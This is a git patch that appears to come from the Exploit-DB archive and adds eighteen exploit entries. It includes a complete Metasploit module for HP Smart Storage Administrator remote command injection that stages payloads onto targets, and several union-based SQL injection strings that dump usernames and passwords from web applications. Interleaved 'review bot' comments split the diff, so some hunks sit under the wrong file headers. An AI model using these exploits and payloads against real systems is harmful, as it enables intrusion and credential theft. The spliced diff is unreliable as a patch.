From dcc7720ad63a15e7236510e101d2cba1c5766c2c Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 11 Feb 2017 05:01:16 +0000 Subject: [PATCH] DB: 2017-02-11 18 new exploits Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit) F5 BIG-IP SSL Virtual Server - Memory Disclosure CMS Lite 1.3.1 - SQL Injection Tiger Post 3.0.1 - SQL Injection Gram Post 1.0 - SQL Injection Youtube Analytics Multi Channel 3.0 - SQL Injection Collabo - Arbitrary File Download Takas Classified 1.1 - SQL Injection Zigaform - SQL Injection Multilanguage Estate Agency Pro 1.2 - SQL Injection QWIKIA 1.1.1 - SQL Injection Automated Job Portal Script - SQL Injection CLUB-8 EMS - SQL Injection Uploadr - SQL Injection CodePaul ClipMass - SQL Injection Video Subscription - SQL Injection D-link DIR-600M - Cross-Site Request Forgery HotelCMS with Booking Engine - SQL Injection --- files.csv | 20 ++- platforms/hardware/remote/41298.txt | 12 ++ platforms/hardware/webapps/41299.html | 92 +++++++++++++ platforms/multiple/remote/41297.rb | 178 ++++++++++++++++++++++++++ platforms/php/webapps/41290.txt | 18 +++ platforms/php/webapps/41291.txt | 20 +++ platforms/php/webapps/41292.txt | 20 +++ platforms/php/webapps/41293.txt | 19 +++ platforms/php/webapps/41294.txt | 19 +++ platforms/php/webapps/41295.txt | 23 ++++ platforms/php/webapps/41296.txt | 18 +++ platforms/php/webapps/41300.txt | 17 +++ platforms/php/webapps/41301.txt | 17 +++ platforms/php/webapps/41302.txt | 23 ++++ platforms/php/webapps/41303.txt | 22 ++++ platforms/php/webapps/41304.txt | 18 +++ platforms/php/webapps/41305.txt | 17 +++ platforms/php/webapps/41306.txt | 17 +++ platforms/php/webapps/41307.txt | 17 +++ 19 files changed, 586 insertions(+), 1 deletion(-) create mode 100755 platforms/hardware/remote/41298.txt create mode 100755 platforms/hardware/webapps/41299.html 
create mode 100755 platforms/multiple/remote/41297.rb create mode 100755 platforms/php/webapps/41290.txt create mode 100755 platforms/php/webapps/41291.txt create mode 100755 platforms/php/webapps/41292.txt create mode 100755 platforms/php/webapps/41293.txt create mode 100755 platforms/php/webapps/41294.txt create mode 100755 platforms/php/webapps/41295.txt create mode 100755 platforms/php/webapps/41296.txt create mode 100755 platforms/php/webapps/41300.txt create mode 100755 platforms/php/webapps/41301.txt create mode 100755 platforms/php/webapps/41302.txt create mode 100755 platforms/php/webapps/41303.txt create mode 100755 platforms/php/webapps/41304.txt create mode 100755 platforms/php/webapps/41305.txt create mode 100755 platforms/php/webapps/41306.txt create mode 100755 platforms/php/webapps/41307.txt diff --git a/files.csv b/files.csv index 1c5cd18c8..c0a1fcc4e 100644 --- a/files.csv +++ b/files.csv 
@@ -8600,7 +8600,7 @@ id,file,description,date,author,platform,type,port
 39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
 39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
-39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
@@ -15264,6 +15264,8 @@ id,file,description,date,author,platform,type,port
 41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
 41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0
 41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0
+41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
+41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37209,3 +37211,19 @@ id,file,description,date,author,platform,type,port
 41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
 41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
+41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41291,platforms/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41292,platforms/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41293,platforms/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41294,platforms/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps,0
+41295,platforms/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41296,platforms/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41300,platforms/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41301,platforms/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41302,platforms/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41303,platforms/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL 
Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
+41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
+41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/hardware/remote/41298.txt b/platforms/hardware/remote/41298.txt
new file mode 100755
index 000000000..cf6120f72
--- /dev/null
+++ b/platforms/hardware/remote/41298.txt
@@ -0,0 +1,12 @@
+/*
+# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
+# Date: [10.02.2017]
+# Exploit Author: [Ege Balcı]
+# Vendor Homepage: [https://f5.com/]
+# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
+# Tested on: [Multiple]
+# CVE : [CVE-2016-9244]
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip
\ No newline at end of file
diff --git a/platforms/hardware/webapps/41299.html b/platforms/hardware/webapps/41299.html
new file mode 100755
index 000000000..8643710d2
--- /dev/null
+++ b/platforms/hardware/webapps/41299.html
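Review bot: The PoC for CVE-2016-9244 is nothing but a link to an opaque `41298.zip` on a third-party host, with no checksum, so a reader has no way to confirm that the archive they fetch is the one the author submitted; add a `# SHA256 (41298.zip): <digest>` line to the header. The `/*` that opens the file is never closed, which is harmless in a .txt but reads like a leftover from a C source header and should be dropped. The Version field lists the affected ranges (12.0.0 - 12.1.2 and 11.4.0 - 11.6.1) but not the releases that fix the issue; a `# Vendor Advisory:` line pointing at F5's Ticketbleed bulletin would let readers check remediation without guessing.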
@@ -0,0 +1,92 @@ +# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability +# Google Dork:N/A +# Date: 07/02/2017 +# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal) +# Vendor Homepage:dlink.com +# Software Link:N/A +# Version:Hardware version: C1 + Firmware version: 3.03 +# Tested on:All Platforms +# CVE :CVE-2017-5874 + +Abstract: +======= + +Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker +to perform an unwanted action on a wireless router for which the user/admin is currently authenticated. + + +Exploitation-Technique: +=================== +Remote + +Severity Rating: +=================== + +7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C) + +Details: +======= +An attacker who lures a DIR-600M authenticated user to browse a malicious website +can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings. + +Proof Of Concept code: +==================== + +1. Add new user with root access + + + + +
+ + + + + + + + +
+ + + + + + +2. changing wireless password + + + + +
+ + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+
+
+
+
diff --git a/platforms/multiple/remote/41297.rb b/platforms/multiple/remote/41297.rb
new file mode 100755
index 000000000..c702ca4fa
--- /dev/null
+++ b/platforms/multiple/remote/41297.rb
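Review bot: The severity line `7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)` scores the access vector as adjacent network, yet the same advisory states `Exploitation-Technique: Remote` and describes luring an authenticated user to a malicious website, which is a network-delivered CSRF and would normally be AV:N; make the vector and the technique line agree. `# Tested on:All Platforms` says nothing about the device under test — the tested hardware/firmware (C1 / 3.03) is already in the Version field and is what this line should carry. The two PoC forms themselves are not readable in this hunk (the added lines after `1. Add new user with root access` and `2. changing wireless password` appear empty), so the CSRF endpoints and parameters could not be checked here.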
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::CmdStager
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "HP Smart Storage Administrator Remote Command Injection",
+ 'Description' => %q{
+ This module exploits a vulnerability found in HP Smart Storage Administrator. By
+ supplying a specially crafted HTTP request, it is possible to control the
+ 'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
+ which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2016-8523']
+ ],
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true
+ },
+ 'Platform' => %w{ linux win },
+ 'Targets' =>
+ [
+ ['Linux', {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'CmdStagerFlavor' => 'bourne'
+ }],
+ ['Linux (x64)', {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86_64,
+ 'CmdStagerFlavor' => 'bourne'
+ }],
+ ['Windows', {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ 'CmdStagerFlavor' => 'certutil'
+ }],
+ ['Windows (x64)', {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86_64,
+ 'CmdStagerFlavor' => 'certutil'
+ }],
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jan 30 2017"
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(2381),
+ # USERNAME/PASS may not be necessary, because the anonymous access is possible
+ OptString.new("USERNAME", [false, 'The username to authenticate as']),
+ OptString.new("PASSWORD", [false, 'The password to authenticate with'])
+ ], self.class)
+ end
+
+ def check
+
+ @cookie = ''
+
+ sig = Rex::Text.rand_text_alpha(8)
+ cmd = "&echo%20#{sig}&echo"
+ res = 
send_command(cmd, true)
+ if not res
+ vprint_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res.code == 200 && res.headers.to_s() =~ /#{sig}/
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ Exploit::CheckCode::Safe
+ end
+
+
+ def login
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+
+ cookie = ''
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => '/proxy/ssllogin',
+ 'vars_post' => {
+ 'redirecturl' => '',
+ 'redirectquerystring' => '',
+ 'user' => username,
+ 'password' => password
+ }
+ })
+
+ if not res
+ fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
+ end
+
+ # CpqElm-Login: success
+ if res.headers['CpqElm-Login'].to_s =~ /success/
+ cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
+ end
+
+ cookie
+ end
+
+
+ def setup_stager
+ execute_cmdstager(:temp => './', :linemax => 2800)
+ end
+
+
+ def execute_command(cmd, opts={})
+ res = send_command(cmd, false)
+ if res && res.code != 200
+ vprint_error("Unexpected response:\n#{res}")
+ fail_with(Failure::Unknown, "There was an unexpected response")
+ end
+ end
+
+
+ def send_command(cmd, check)
+ if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
+ @cookie = login
+ if @cookie.empty?
+ fail_with(Failure::NoAccess, "#{peer} - Login failed")
+ else
+ print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
+ end
+ end
+
+ req_opts = {}
+
+ # For the check() function, use GET method
+ if check
+ req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
+ req_opts['method'] = "GET"
+ else
+ req_opts['uri'] = "/HPSSA/index.htm"
+ req_opts['method'] = "POST"
+ req_opts['vars_post'] = {'msf'=>'red'}
+ case target.opts['Platform']
+ when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
+ when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
+ end
+ end
+
+ unless @cookie.empty? 
+ browser_chk = 'HPSMH-browser-check=done for this session'
+ curl_loc = "curlocation-#{datastore['USERNAME']}="
+ req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
+ end
+
+ send_request_cgi(req_opts)
+ end
+
+ def exploit
+ @cookie = ''
+
+ setup_stager
+ end
+end
+
diff --git a/platforms/php/webapps/41290.txt b/platforms/php/webapps/41290.txt
new file mode 100755
index 000000000..92c1820da
--- /dev/null
+++ b/platforms/php/webapps/41290.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://www.cmslite.co.uk/
+# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
+# Demo: http://www.cmslite.co.uk/
+# Version: 1.3.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?Style=[SQL]
+# Etc...
+# # # # #
diff --git a/platforms/php/webapps/41291.txt b/platforms/php/webapps/41291.txt
new file mode 100755
index 000000000..2be4327e5
--- /dev/null
+++ b/platforms/php/webapps/41291.txt
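Review bot: `execute_command` carries on silently when `send_command` returns nil — the guard `if res && res.code != 200` only fails on a non-200 reply, so a timed-out stager chunk is treated as delivered, whereas `check` and `login` both treat a nil response as a timeout and stop. Fail explicitly after `res = send_command(cmd, false)`: `fail_with(Failure::Unknown, "#{peer} - Connection timed out") unless res`, and then the following condition can simply be `if res.code != 200`. `check` also runs `echo` on the target through the same injection, so it is an intrusive check; a one-line comment on `def check` saying so would help operators decide whether to run it. The `class Metasploit3` name and the `self.class` argument to `register_options` look like the older module conventions; worth confirming against the framework version this module is meant to load in.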
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles v3.0.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075
+# Demo: http://demo.vtcreators.com/tigerpost/
+# Version: 3.0.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
+# -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41292.txt b/platforms/php/webapps/41292.txt
new file mode 100755
index 000000000..b74db69f7
--- /dev/null
+++ b/platforms/php/webapps/41292.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Gram Post - Instagram Auto Post Multi Accounts with Paypal integration v1.0 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/gram-post-instagram-auto-post-multi-accounts-with-paypal-integration/19264650
+# Demo: http://demo.vtcreators.com/grampost/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/instagram_accounts/update?id=[SQL]
+# -9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41293.txt b/platforms/php/webapps/41293.txt
new file mode 100755
index 000000000..1d5de4a55
--- /dev/null
+++ b/platforms/php/webapps/41293.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://vtcreators.com/
+# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
+# Demo: http://demo.vtcreators.com/yamc/
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41294.txt b/platforms/php/webapps/41294.txt
new file mode 100755
index 000000000..d7238c2c1
--- /dev/null
+++ b/platforms/php/webapps/41294.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Collabo - TeamBusiness Collaboration Network - Arbitrary File Download
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://321-internet.com/
+# Software Buy: https://codecanyon.net/item/collabo-teambusiness-collaboration-network/15242543
+# Demo: http://321-internet.com/codecanyon/collabo/demo/collabo/index.php
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# Exploit :
+# Login as regular user
+# http://localhost/[PATH]/download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41295.txt b/platforms/php/webapps/41295.txt
new file mode 100755
index 000000000..206028e88
--- /dev/null
+++ b/platforms/php/webapps/41295.txt
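Review bot: The PoC `download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php` does not say which of the three parameters is the unchecked one or what `[FILE]` stands for (a database id, a filename, a relative path), so a reader cannot tell whether this is an authorization bypass over other users' file ids or a path-based read of arbitrary files; name the parameter and give one concrete request that returns a file the regular user should not be able to reach. `Version: N/A` leaves the affected release unknown — if the tested build cannot be identified, say so explicitly rather than leaving the field blank.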
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Takas Classified – Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://artifectx.com/
+# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
+# Demo: http://takas.artifectx.com/
+# Version: 1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
+# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
+# Etc... Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41296.txt b/platforms/php/webapps/41296.txt
new file mode 100755
index 000000000..065c8c5d9
--- /dev/null
+++ b/platforms/php/webapps/41296.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://php-form-builder.zigaform.com/
+# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
+# Demo: http://demo-phpformbuilder.zigaform.com/index.php
+# Version: 2.9.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
+# Etc...
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41300.txt b/platforms/php/webapps/41300.txt
new file mode 100755
index 000000000..8eb257cba
--- /dev/null
+++ b/platforms/php/webapps/41300.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Multilanguage Estate Agency Pro 1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://djrust26.hu/
+# Software Buy: https://codecanyon.net/item/multilanguage-estate-agency-pro-12/14521069
+# Demo: http://djrust26.hu/realestate/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/property_show.php?id=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41301.txt b/platforms/php/webapps/41301.txt
new file mode 100755
index 000000000..56195036e
--- /dev/null
+++ b/platforms/php/webapps/41301.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: QWIKIA - Ask And Answer Platform 1.1.1 - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://xandr.co/
+# Software Buy: http://xandr.co/portfolio/qwikia
+# Demo: http://qwikia.xandr.co/
+# Version: 1.1.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?q=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41302.txt b/platforms/php/webapps/41302.txt
new file mode 100755
index 000000000..886e11c40
--- /dev/null
+++ b/platforms/php/webapps/41302.txt
@@ -0,0 +1,23 @@
+# # # # #
+# Exploit Title: Automated Job Portal Script - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://www.jagaad.com/
+# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
+# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/jobdetail.php?id=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
+#
+# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
+#
+# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
+-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
\ No newline at end of file
diff --git a/platforms/php/webapps/41303.txt b/platforms/php/webapps/41303.txt
new file mode 100755
index 000000000..86fe8afc8
--- /dev/null
+++ b/platforms/php/webapps/41303.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://rexbd.net/
+# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
+# Demo: http://ems.rexbd.net/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as sales man user
+# http://localhost/[PATH]/editwatch.php?id=[SQL]
+-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
+#
+# http://localhost/[PATH]/editwatch.php?id=[SQL]
+-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41304.txt b/platforms/php/webapps/41304.txt
new file mode 100755
index 000000000..f4d3fb39c
--- /dev/null
+++ b/platforms/php/webapps/41304.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Uploadr - Project Files Management - SQL Injection
+# Google Dork: N/A
+# Date: 10.02.2017
+# Vendor Homepage: http://lagunaproperty.com/
+# Software Buy: https://codecanyon.net/item/uploadr-project-files-management/13545125
+# Demo: http://download.lagunaproperty.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search?keyword=[SQL]
+# http://localhost/[PATH]/download?file=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41305.txt b/platforms/php/webapps/41305.txt
new file mode 100755
index 000000000..26a289cb3
--- /dev/null
+++ b/platforms/php/webapps/41305.txt
